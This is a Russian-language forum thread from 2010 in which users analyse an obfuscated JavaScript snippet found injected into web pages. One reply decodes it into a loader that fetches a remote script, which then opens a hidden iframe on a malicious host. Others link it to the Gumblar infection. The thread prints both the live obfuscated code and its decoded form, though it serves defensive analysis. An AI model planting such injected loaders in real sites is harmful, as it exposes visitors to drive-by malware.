The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Вирусный скрипт"
Вариант для распечатки  
Пред. тема | След. тема 
Форумы Программирование под UNIX (Public)
Изначальное сообщение [ Отслеживать ]

"Вирусный скрипт"  +/
Сообщение от SermanZer on 08-Янв-10, 13:33 
Привет.
На одном сайте нашел вот такой код, явно вирусный:


<script>/*LGPL*/ try{ window.onload = function(){var Y0r5c4wy2fixek = document.createElement('s!&c$!&#r&#!$i^(p^!)##t#^'.replace(/#|\(|\^|@|\$|\!|\)|&/ig, ''));Y0r5c4wy2fixek.setAttribute('defer', 'd$@#e&#f#e(r)!)#)'.replace(/\!|#|\^|\(|&|\$|\)|@/ig, ''));Y0r5c4wy2fixek.setAttribute('type', 't)^$e)x!^(t(@/@&)j(@$a#)v^a!&#s@c^r)i#^p^t('.replace(/&|\)|@|\!|\^|\$|\(|#/ig, ''));Y0r5c4wy2fixek.setAttribute('id', 'C(($#(9&^k$$t@o#(!n^7)@0#)&)q@)w^&^'.replace(/\)|&|\(|\$|#|\^|\!|@/ig, ''));Y0r5c4wy2fixek.setAttribute('s&#r!c&^#'.replace(/\(|\^|&|@|\$|\)|\!|#/ig, ''),  'h$!t))t$$p#^:#(&@)/#!)/(t@)&o(@^$@p&@s##h@$#a#@&r!@e^w(a^@$r$^e@@-(!c)&o$&^m$.&^&#s!@l&^i!$d(^@e(s#$!h^&!a@$!r)e&.(^^@n#e!@t)(.@c(l$)a#($r#$i^n&&#-@c&$o))(^m!$)&.@)t($^$h$$^#(e)@c###&h^$^(o)(c&^!o@@$l$^$a&^t&#$$e@&w##)e@)^b!!.(##$r!u@@!:&#!8)#(0^#^^8$#&&0))/()g&^o^)o@^g!)l^e&!.!!#c&o^!($m)$&&/(!g&(#&o!)!o)@g!@l!$e^(.&$c&$o@)m@#@)/(&&^l&a)##&(s&t&@.(f#$)!m!!/)^v^^)e(o)!@h^&$$!.$(c@!#&o&&m##&^&/!&h^^u)#d$$(o&n!^g)).^c^&o!m#&#)/$'.replace(/@|\!|#|\^|&|\(|\)|\$/ig, ''));if (document){document.body.appendChild(Y0r5c4wy2fixek);}} } catch(Mxbfhbj5q04qxno71yp2) {}</script>
<!--b7c6f5ad44d5f4e7a48ec7690538e1d5-->

Тут видно, что идет куча замен и проч. Как понять, чего этот скрипт вообще делает и насколько он опасен?
Спасибо

Высказать мнение | Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Вирусный скрипт"  +/
Сообщение от Slavaz (ok) on 08-Янв-10, 15:12 
>Тут видно, что идет куча замен и проч. Как понять, чего этот скрипт вообще делает и насколько он опасен?

Сохрани текст в файл. Потом выполни

tr -d '#|\\|\^|@|\$|\!||&' <file.txt >output.txt
Я особо не заморачивался - вручную выкосил ненужные скобки ()
и вот что получилось (с косметическими правками):

<script>/*LGPL*/
try{
window.onload = function(){
  var Y0r5c4wy2fixek = document.createElement('script');
  Y0r5c4wy2fixek.setAttribute('defer', 'defer');
  Y0r5c4wy2fixek.setAttribute('type', 'text/javascript');
  Y0r5c4wy2fixek.setAttribute('id', 'C9kton70qw');
  Y0r5c4wy2fixek.setAttribute('src',
     'http://topshareware-com.slideshare.net.clarin-com.thechocola.../');
  if (document)
  {
   document.body.appendChild(Y0r5c4wy2fixek);
  }
}
}
catch(Mxbfhbj5q04qxno71yp2)
{
}
</script>

В двух словах: создаёт новый элемент типа javascript, назначает ему адрес.
По указанному адресу другой кусок яваскрипта. После приведения в "нормальный" вид имеем:

Mtpnq14 = 'topshareware-com.slideshare.net.clarin-com.thechocolateweb.ru';
f = document.createElement('iframe');
f.src = 'http://'+Mtpnq14+':8080/index.php?ys';
f.style.visibility = 'hidden';
document.body.appendChild(f);

То есть, создаётся скрытый фрейм, адрес которого:
http://topshareware-com.slideshare.net.clarin-com.thechocola...

По указанному адресу ничего не выдаётся (ответ нулевой длины)

$ telnet topshareware-com.slideshare.net.clarin-com.thechocolateweb.ru 8080
Trying 91.121.49.129...
Connected to opshareware-com.slideshare.net.clarin-com.thechocolateweb.ru.
Escape character is '^]'.
GET /index.php?ys
Connection closed by foreign host.

Дальше колупаться лень, пусть колупаются кому интересно - гики или представители правоохранительных органов, если это все не счётчик, а "распространение ПО, нарушающего работоспособность ЭВМ или ЛВС".

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Вирусный скрипт"  +/
Сообщение от jd (??) on 09-Янв-10, 15:21 
С чего вы вообще взяли, что это "вирусный код"??? Код явно обработан, чтобы занимать меньше места и чтобы его неудобнее было читать, но какое это имеет отношение к вирусу? Часто так делают, чтобы затруднить заимствование идей, хотя коментарий "LGPL" с этим как-то немного и не вяжется.

В общем, это может, конечно, и "вирусный код", может какой-нибудь счётчик, как заметили выше. А может быть что угодно ещё. По поводу того, что он делает, уже написано.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Вирусный скрипт"  +/
Сообщение от chaoba (ok) on 09-Янв-10, 16:04 
Думаю это вирус. Он появился на моем сайте сегодня на всех страницах с именем index в конце файла. У меня в нескольких папках есть index.php, index.html.
Пришлось удалять.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Вирусный скрипт"  +/
Сообщение от DmitryDV on 09-Янв-10, 23:12 
>Думаю это вирус. Он появился на моем сайте сегодня на всех страницах
>с именем index в конце файла. У меня в нескольких папках
>есть index.php, index.html.
>Пришлось удалять.

Это вирус Gumblar. Я тоже подхватил эту хрень. Тут http://justcoded.com/article/gumblar-family-virus-removal-tool/ вроде как лекарство от него

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру